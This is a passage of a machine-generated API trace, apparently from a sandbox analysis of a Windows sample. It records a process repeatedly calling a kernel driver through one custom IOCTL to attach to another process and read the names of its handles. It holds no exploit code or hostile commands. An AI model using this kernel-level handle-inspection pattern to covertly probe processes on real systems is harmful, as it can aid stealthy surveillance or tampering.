ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.437] ObfDereferenceObject (Object=0xfffffa80036d25e0) returned 0x2 [0148.437] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.437] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.437] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.437] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.437] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.437] PsAcquireProcessExitSynchronization () returned 0x0 [0148.437] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.437] ObReferenceObjectByHandle (in: Handle=0x12f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010ff930, HandleInformation=0x0) returned 0x0 [0148.437] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.437] PsReleaseProcessExitSynchronization () returned 0x2 [0148.438] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.438] ObQueryNameString (in: Object=0xfffff8a0010ff930, ObjectNameInfo=0xfffffa8002feb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002feb044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.438] ObfDereferenceObject (Object=0xfffff8a0010ff930) returned 0x1 [0148.438] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.438] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.438] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.438] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.438] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.438] PsAcquireProcessExitSynchronization () returned 0x0 [0148.438] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.438] ObReferenceObjectByHandle (in: Handle=0x12f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002176990, HandleInformation=0x0) returned 0x0 [0148.438] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.438] PsReleaseProcessExitSynchronization () returned 0x2 [0148.438] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.438] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.439] ObfDereferenceObject (Object=0xfffffa8002176990) returned 0x2 [0148.439] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.439] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.439] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.439] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.439] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.439] PsAcquireProcessExitSynchronization () returned 0x0 [0148.439] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.439] ObReferenceObjectByHandle (in: Handle=0x12f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b9eaf0, HandleInformation=0x0) returned 0x0 [0148.440] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.440] PsReleaseProcessExitSynchronization () returned 0x2 [0148.440] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.440] ObQueryNameString (in: Object=0xfffff8a001b9eaf0, ObjectNameInfo=0xfffffa8002fdd044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fdd044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.440] ObfDereferenceObject (Object=0xfffff8a001b9eaf0) returned 0x1 [0148.440] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.440] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.440] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.440] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.440] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.440] PsAcquireProcessExitSynchronization () returned 0x0 [0148.440] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.441] ObReferenceObjectByHandle (in: Handle=0x1300, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001ba4830, HandleInformation=0x0) returned 0x0 [0148.441] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.441] PsReleaseProcessExitSynchronization () returned 0x2 [0148.441] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.441] ObQueryNameString (in: Object=0xfffff8a001ba4830, ObjectNameInfo=0xfffffa8002fda044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fda044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.441] ObfDereferenceObject (Object=0xfffff8a001ba4830) returned 0x1 [0148.441] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.441] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.441] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.442] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0148.442] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.442] PsAcquireProcessExitSynchronization () returned 0x0 [0148.442] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.442] ObReferenceObjectByHandle (in: Handle=0x1308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036d2730, HandleInformation=0x0) returned 0x0 [0148.442] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.442] PsReleaseProcessExitSynchronization () returned 0x2 [0148.442] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.442] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd4044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.442] ObfDereferenceObject (Object=0xfffffa80036d2730) returned 0x2 [0148.442] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.443] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.443] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.443] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.443] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.443] PsAcquireProcessExitSynchronization () returned 0x0 [0148.443] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.443] ObReferenceObjectByHandle (in: Handle=0x130c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001943740, HandleInformation=0x0) returned 0x0 [0148.443] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.443] PsReleaseProcessExitSynchronization () returned 0x2 [0148.443] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.443] ObQueryNameString (in: Object=0xfffff8a001943740, ObjectNameInfo=0xfffffa8002fa6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa6044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.444] ObfDereferenceObject (Object=0xfffff8a001943740) returned 0x1 [0148.444] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.444] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.444] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.444] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.444] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.444] PsAcquireProcessExitSynchronization () returned 0x0 [0148.444] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.444] ObReferenceObjectByHandle (in: Handle=0x1318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800b53c5a0, HandleInformation=0x0) returned 0x0 [0148.444] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.445] PsReleaseProcessExitSynchronization () returned 0x2 [0148.445] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.445] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.445] ObfDereferenceObject (Object=0xfffffa800b53c5a0) returned 0x2 [0148.445] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.445] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.445] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.445] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0148.445] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.445] PsAcquireProcessExitSynchronization () returned 0x0 [0148.445] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.445] ObReferenceObjectByHandle (in: Handle=0x132c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002967d10, HandleInformation=0x0) returned 0x0 [0148.446] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.446] PsReleaseProcessExitSynchronization () returned 0x2 [0148.446] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.446] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.446] ObfDereferenceObject (Object=0xfffffa8002967d10) returned 0x2 [0148.446] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.446] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.446] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.446] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.446] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.446] PsAcquireProcessExitSynchronization () returned 0x0 [0148.446] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.446] ObReferenceObjectByHandle (in: Handle=0x1344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800b53c6f0, HandleInformation=0x0) returned 0x0 [0148.446] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.446] PsReleaseProcessExitSynchronization () returned 0x2 [0148.446] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.447] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe9044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.447] ObfDereferenceObject (Object=0xfffffa800b53c6f0) returned 0x2 [0148.447] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.447] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.447] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.447] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0148.447] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.447] PsAcquireProcessExitSynchronization () returned 0x0 [0148.447] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.447] ObReferenceObjectByHandle (in: Handle=0x135c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019266a0, HandleInformation=0x0) returned 0x0 [0148.447] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.447] PsReleaseProcessExitSynchronization () returned 0x2 [0148.447] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.915] ObQueryNameString (in: Object=0xfffff8a0019266a0, ObjectNameInfo=0xfffffa8002fd5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd5044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.916] ObfDereferenceObject (Object=0xfffff8a0019266a0) returned 0x2 [0148.916] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.916] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.916] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.916] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0148.916] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.916] PsAcquireProcessExitSynchronization () returned 0x0 [0148.916] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.916] ObReferenceObjectByHandle (in: Handle=0x1364, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800209e600, HandleInformation=0x0) returned 0x0 [0148.916] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.916] PsReleaseProcessExitSynchronization () returned 0x2 [0148.916] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.916] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ffc404, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ffc404, ReturnLength=0xfffff88005163508) returned 0x0 [0148.916] ObfDereferenceObject (Object=0xfffffa800209e600) returned 0x11 [0148.916] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.917] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.917] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf2, lpOverlapped=0x0) returned 1 [0148.917] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.917] PsAcquireProcessExitSynchronization () returned 0x0 [0148.917] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.917] ObReferenceObjectByHandle (in: Handle=0x1368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019277c0, HandleInformation=0x0) returned 0x0 [0148.917] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.917] PsReleaseProcessExitSynchronization () returned 0x2 [0148.917] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.917] ObQueryNameString (in: Object=0xfffff8a0019277c0, ObjectNameInfo=0xfffffa8002ffa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ffa044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.917] ObfDereferenceObject (Object=0xfffff8a0019277c0) returned 0x2 [0148.917] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.917] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.917] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0148.917] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.917] PsAcquireProcessExitSynchronization () returned 0x0 [0148.917] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.918] ObReferenceObjectByHandle (in: Handle=0x1370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800218e960, HandleInformation=0x0) returned 0x0 [0148.918] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.918] PsReleaseProcessExitSynchronization () returned 0x2 [0148.918] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.918] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9f044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.918] ObfDereferenceObject (Object=0xfffffa800218e960) returned 0x1 [0148.918] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.918] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.918] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.918] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0148.918] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.918] PsAcquireProcessExitSynchronization () returned 0x0 [0148.918] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.918] ObReferenceObjectByHandle (in: Handle=0x1374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001abf190, HandleInformation=0x0) returned 0x0 [0148.918] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.918] PsReleaseProcessExitSynchronization () returned 0x2 [0148.918] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.918] ObQueryNameString (in: Object=0xfffff8a001abf190, ObjectNameInfo=0xfffffa8002fd1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd1044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.918] ObfDereferenceObject (Object=0xfffff8a001abf190) returned 0x2 [0148.918] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.919] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.919] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.919] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x11c, lpOverlapped=0x0) returned 1 [0148.919] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.919] PsAcquireProcessExitSynchronization () returned 0x0 [0148.919] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.919] ObReferenceObjectByHandle (in: Handle=0x1380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002806070, HandleInformation=0x0) returned 0x0 [0148.919] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.919] PsReleaseProcessExitSynchronization () returned 0x2 [0148.919] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.919] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd6044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.919] ObfDereferenceObject (Object=0xfffffa8002806070) returned 0x1 [0148.919] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.919] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.919] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.919] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, 